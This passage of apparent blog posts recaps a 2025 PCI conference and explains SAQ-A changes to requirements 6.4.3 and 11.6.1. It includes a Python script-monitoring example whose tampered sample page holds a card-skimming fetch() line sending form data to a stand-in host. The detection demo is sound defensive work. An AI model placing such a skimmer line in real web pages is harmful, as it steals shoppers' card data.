Inside the 2025 PCI SSC North America Community Meeting: Insights, Myths, and Key Takeaways

This week, the payments security community gathered in Fort Worth, Texas, for the highly anticipated 2025 PCI SSC North America Community Meeting. Held from September 16–18, the event brought together Council staff, industry experts, and stakeholders from across North America to discuss the latest in payment card security, technical updates, and collaborative opportunities.

Setting the Stage: Why the PCI Community Meeting Matters

Every year, the PCI SSC North America Community Meeting is more than just a conference; it’s a gathering that wouldn’t be the same without the varied perspectives from across the industry, including yours. The event sparks innovation, deepens relationships, and helps ensure that the standards safeguarding cardholder data stay strong and up to date in a rapidly changing environment.

Key Themes and Highlights

1. Technical and Security Updates

A central focus of this year’s meeting was the latest technical and security developments in the payments ecosystem. Council staff and industry leaders shared insights on evolving threats, compliance requirements, and best practices for securing payment data. Attendees learned about upcoming changes to PCI standards and how these will affect merchants, service providers, and solution vendors.

2. Engaging Sessions and Expert Speakers

The agenda featured a robust lineup of sessions led by renowned speakers and subject matter experts. Topics ranged from practical guidance on implementing PCI DSS v4.0 to deep dives into emerging technologies such as tokenization, cloud security, and AI-driven fraud prevention. Panel discussions and interactive workshops encouraged lively debate and knowledge sharing among participants.

3. Community Collaboration

Collaboration remains a cornerstone of the PCI Community Meeting. This year’s event emphasized the importance of active participation within the PCI ecosystem.
Attendees were encouraged to join Special Interest Groups (SIGs), contribute to standards development, and network with peers facing similar challenges.

4. Looking Ahead: A Global Perspective

While the focus was on North America, the meeting also previewed upcoming PCI SSC events in Europe and Asia-Pacific, highlighting the global nature of payment security challenges and the need for international cooperation.

My Presentation: Busting PCI Myths

A personal highlight this year came unexpectedly when I was asked at the last minute to fill in for a tech talk slot. I presented “Busting PCI Myths: Practical Truths for Real Security,” a topic I’m passionate about after nearly two decades as a QSA and PCI advisor. During my talk, I addressed some of the most persistent misconceptions that continue to circulate in the industry:

The key takeaway? Don’t let PCI myths lull you into a false sense of security. Real protection comes from understanding your true responsibilities and building strong, layered defenses.

Ongoing Challenges: Requirements 6.4.3 and 11.6.1

Just like last year, there was significant discussion and some confusion around PCI DSS requirements 6.4.3 and 11.6.1. These requirements mandate script inventory, monitoring, and tamper detection for payment pages, and under the revised SAQ-A eligibility criteria they remain a concern even for merchants completing the simplest SAQ-A. Many attendees were seeking practical guidance on how to implement these controls effectively, especially in cloud environments and where third-party service providers are involved.

Final Thoughts

The 2025 PCI SSC North America Community Meeting reaffirmed its status as the premier forum for shaping the future of payment security. Whether you’re a seasoned QSA or new to PCI, the event is a reminder that compliance is a journey, not a checkbox. If you missed it, I highly recommend checking out the PCI SSC website for session recordings and resources. Let’s continue to bust myths, share knowledge, and work together to build a stronger, more secure payments ecosystem.
Did you attend the meeting or have thoughts on some of the new requirements? Share your experiences in the comments below!
Navigating the New PCI DSS SAQ-A Updates: What Merchants Need to Know

The Payment Card Industry Security Standards Council (PCI SSC) has introduced significant updates to the Self-Assessment Questionnaire A (SAQ-A), effective March 31, 2025. These updates change merchant eligibility requirements and compliance obligations, particularly for e-commerce businesses that outsource cardholder data processing. While the removal of two specific requirements, 6.4.3 and 11.6.1, might initially appear to simplify the compliance process, a closer examination reveals a more complex reality. The updates shift the focus from explicit controls to broader, high-standard obligations, raising the bar for merchants seeking to qualify for SAQ-A.

This blog post delves into the key changes to SAQ-A, their implications for merchants, service providers, and Qualified Security Assessors (QSAs), and actionable steps stakeholders can take to navigate this evolving compliance landscape.

Understanding the Changes to SAQ-A

The updated SAQ-A introduces two major changes: specific requirements (6.4.3 and 11.6.1) are removed, and new eligibility criteria are added. Let’s examine these changes in more detail.

1. Removal of Requirements 6.4.3 and 11.6.1

Previously, SAQ-A merchants needed to comply with the following requirements:

Requirement 6.4.3: Required an inventory of all scripts on payment pages, with a written justification for each, and controls ensuring that each script was authorized and its integrity assured.

Requirement 11.6.1: Required merchants to monitor payment pages for unauthorized modifications, including changes, additions, and deletions to scripts or to security-impacting HTTP headers.

These controls were designed to protect against malicious script-based attacks, such as eSkimming or Magecart, in which attackers inject or alter JavaScript on checkout pages to capture cardholder data as it is entered. With the latest SAQ-A update, these requirements are no longer explicitly mandated for SAQ-A merchants. This does not mean that the underlying security objectives have been abandoned.
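As an added illustration (not code from the original post, and not a product of any vendor it mentions), the following Python script shows the mechanics the two requirements describe. The 6.4.3 side is a baseline inventory of a payment page’s scripts, each with an SRI-style hash and a written business justification; the 11.6.1 side compares a later copy of the page and its response headers against that inventory and reports added, removed and modified scripts, external scripts that carry no integrity attribute, and changed security headers. The HTML, the response headers, the hostnames, the `sha384-AAAA` integrity value, the justification text and the set of headers treated as security-impacting are all constructed assumptions for the example; in practice the “observed” page would be fetched from the live checkout URL on a schedule.

```python
import base64
import hashlib
from html.parser import HTMLParser

# Response headers treated as "security-impacting" for the comparison.
# This set is an assumption for the example; extend it for your environment.
SECURITY_HEADERS = ("content-security-policy", "strict-transport-security", "x-frame-options")


def sri_hash(body: str) -> str:
    """SRI-style digest of script text: 'sha384-' + base64(SHA-384)."""
    digest = hashlib.sha384(body.encode("utf-8")).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


class _ScriptCollector(HTMLParser):
    """Collect every <script>: its src and integrity attributes, plus any inline body."""

    def __init__(self):
        super().__init__()
        self.scripts, self._current = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data  # script content is delivered raw (CDATA)

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def extract_scripts(html: str) -> dict:
    """Return {script key: integrity value}. External scripts are keyed by src and
    carry their integrity attribute (None if absent); inline scripts are keyed by
    position ('inline#0', ...) and carry a hash computed over their body."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    found, n = {}, 0
    for s in p.scripts:
        if s["src"]:
            found[s["src"]] = s["integrity"]
        else:
            found[f"inline#{n}"] = sri_hash(s["body"].strip())
            n += 1
    return found


def build_inventory(html: str, headers: dict, justifications: dict) -> dict:
    """6.4.3-style baseline: each script with its integrity value and a written
    justification. A script with no justification is refused so nothing
    unexplained enters the authorized baseline."""
    scripts = {}
    for key, integrity in extract_scripts(html).items():
        if key not in justifications:
            raise ValueError(f"no business justification recorded for {key}")
        scripts[key] = {"integrity": integrity, "justification": justifications[key]}
    low = {k.lower(): v for k, v in headers.items()}
    return {"scripts": scripts, "headers": {h: low[h] for h in SECURITY_HEADERS if h in low}}


def check_page(inventory: dict, html: str, headers: dict) -> list:
    """11.6.1-style comparison of an observed page against the baseline.
    Returns human-readable findings; an empty list means no unauthorized change."""
    findings = []
    expected, observed = inventory["scripts"], extract_scripts(html)
    for key in sorted(observed.keys() - expected.keys()):
        findings.append(f"ADDED script not in inventory: {key}")
    for key in sorted(expected.keys() - observed.keys()):
        findings.append(f"REMOVED script from inventory: {key}")
    for key in sorted(expected.keys() & observed.keys()):
        if observed[key] != expected[key]["integrity"]:
            findings.append(f"MODIFIED script {key}: integrity changed")
    for key, integrity in observed.items():
        if not key.startswith("inline#") and integrity is None:
            findings.append(f"UNVERIFIABLE external script without SRI integrity: {key}")
    live = {k.lower(): v for k, v in headers.items()}
    for name in SECURITY_HEADERS:
        if inventory["headers"].get(name) != live.get(name):
            findings.append(f"CHANGED security header {name}: "
                            f"{inventory['headers'].get(name)!r} -> {live.get(name)!r}")
    return findings


# --- constructed sample data (not a real merchant site; hash value is a placeholder) ---
BASELINE_HTML = """<html><head>
<script src="https://cdn.example.test/checkout.js" integrity="sha384-AAAA"></script>
</head><body>
<form id="pay"><iframe src="https://psp.example.test/card-frame"></iframe></form>
<script>window.dataLayer = [];</script>
</body></html>"""
BASELINE_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self' https://cdn.example.test",
    "Strict-Transport-Security": "max-age=31536000",
}
JUSTIFICATIONS = {  # 6.4.3 asks why each script is on the payment page
    "https://cdn.example.test/checkout.js": "form validation, owned by payments team",
    "inline#0": "analytics data-layer bootstrap, approved by security",
}
# A Magecart-style tampered copy: an unauthorized CDN script appears, the inline
# script now exfiltrates the form, and the CSP has been loosened to allow it.
TAMPERED_HTML = BASELINE_HTML.replace(
    "<script>window.dataLayer = [];</script>",
    '<script src="https://static.example-cdn.test/jquery.min.js"></script>\n'
    "<script>window.dataLayer = []; fetch('https://static.example-cdn.test/c?d='"
    " + document.forms.pay.innerText);</script>",
)
TAMPERED_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline' https:",
    "Strict-Transport-Security": "max-age=31536000",
}


def demo() -> list:
    """Build the baseline from the authorized page, then check the tampered copy."""
    inventory = build_inventory(BASELINE_HTML, BASELINE_HEADERS, JUSTIFICATIONS)
    assert check_page(inventory, BASELINE_HTML, BASELINE_HEADERS) == []  # baseline is clean
    return check_page(inventory, TAMPERED_HTML, TAMPERED_HEADERS)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run against the tampered copy the check reports four findings: the added `jquery.min.js`, the same script flagged as unverifiable because it carries no SRI hash, the modified inline script, and the loosened Content-Security-Policy. Keying inline scripts by position means an inserted inline script shifts later ordinals and surfaces as a removal plus an addition, which is still an alert; a real deployment would also record who approved each baseline change and route findings to the incident process rather than to stdout.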
2. New Eligibility Criteria

While removing 6.4.3 and 11.6.1 might seem like a relaxation of obligations, the new eligibility criterion significantly raises the compliance threshold. To qualify for SAQ-A, merchants must now confirm that their entire e-commerce site, not just the payment page, is secure and not susceptible to attacks from malicious scripts. This includes:

Protection against first-party, third-party, and external scripts that could compromise e-commerce systems.

Comprehensive security measures to prevent vulnerabilities across the entire website, beyond the scope of the payment page.

This shift in focus creates a circular compliance challenge: even though 6.4.3 and 11.6.1 are no longer required, the new eligibility requirement effectively necessitates adherence to the principles of these controls. Merchants must still implement robust protections, such as script monitoring and integrity checks, to secure their e-commerce environments and maintain compliance.

Guidance and Clarifications

On February 28, 2025, the PCI SSC released FAQ 1588, further clarifying the updated SAQ-A requirements. Key takeaways include:

1. Scope: The new eligibility criteria apply only to merchant sites hosting embedded payment forms (e.g., iFrames). Redirects or links to payment pages are excluded. Third parties whose scripts are unrelated to payment processing and incapable of compromising account data security are not considered third-party service providers.

2. Eligibility Options: Implementing requirements 6.4.3 and 11.6.1 remains sufficient to meet the new eligibility criteria. Alternative solutions, such as penetration testing, web application firewalls (WAFs), or processor attestations, may also fulfill the criteria, subject to QSA discretion. Provided merchants adhere to the processor’s implementation guidelines, payment processors can provide written confirmation that their iFrame solutions include the necessary protection against script-based attacks.

What Hasn’t Changed?
Despite the updates to SAQ-A, several key elements remain unchanged:

1. Compliance Deadlines: The deadline for compliance with PCI DSS v4.0.1, including requirements 6.4.3 and 11.6.1, remains March 31, 2025, for all merchants not eligible for SAQ-A.

2. Requirements for Service Providers: Service providers must still comply with 6.4.3 and 11.6.1, ensuring comprehensive script inventory, monitoring, and security of payment flows.

3. Security Expectations for SAQ-A Merchants: While the compliance process may appear streamlined, SAQ-A merchants are still expected to implement robust protections against vulnerabilities, particularly those related to script-based attacks.

Implications for Stakeholders

The changes to SAQ-A have far-reaching implications for merchants, service providers, and QSAs. Here’s what each group needs to know:

1. For SAQ-A Merchants

The new eligibility criteria are likely to pose significant challenges for merchants:

Eligibility Hurdles: To qualify for SAQ-A, merchants must now secure their entire e-commerce site against script-based attacks. This requires implementing robust script controls and monitoring solutions, even though 6.4.3 and 11.6.1 are no longer explicitly required.

Expanded Compliance Obligations: Merchants who cannot meet the new eligibility criteria will need to complete other, more comprehensive Self-Assessment Questionnaires (SAQs), such as SAQ A-EP. This represents a significant compliance uplift, as SAQ A-EP includes 151 requirements compared to the 19 in SAQ-A.

2. For Service Providers

Service providers play a crucial role in helping merchants navigate these changes:

Educating Merchants: Small merchants must be educated about the importance of script controls and the implications of the new eligibility criteria. Misinterpreting the updates as a relaxation of obligations could leave merchants vulnerable to attacks.
Offering Solutions: Service providers can generate additional revenue by offering value-added services that simplify compliance for merchants while enhancing their security posture. For example, solutions that monitor and secure scripts can help merchants meet the new eligibility criteria.

3. For QSAs

Qualified Security Assessors must adapt their approach to reflect the new SAQ-A requirements:

Clarifying Misconceptions: QSAs must emphasize that removing 6.4.3 and 11.6.1 does not reduce security obligations. Under the new eligibility criteria, the expectation to secure e-commerce environments remains unchanged.

Providing Guidance: QSAs should recommend proven browser-enforced controls, such as Content Security Policy (CSP) and Subresource Integrity (SRI), or third-party platforms, such as Human Security, Source Defense’s platform, or Jscrambler, to help merchants secure their websites and achieve compliance. One caveat worth passing on to merchants: CSP restricts where scripts may load from and SRI verifies that a pinned external file is unmodified, but neither produces the documented inventory with business justification that 6.4.3 describes, and SRI covers only scripts whose hashes are pinned, so both are best paired with a monitoring process.

Addressing the Compliance Challenge

Merchants facing the new SAQ-A eligibility criteria have several options to ensure compliance:

1. Conduct Web Application Testing

Merchants can take a proactive approach by conducting web application assessments to demonstrate that their e-commerce site is not susceptible to malicious script-based attacks. This approach gives merchants the evidence needed to satisfy the new eligibility requirements and a measure of control over their compliance.

2. Implement 6.4.3 and 11.6.1 Across the Entire Site

Although these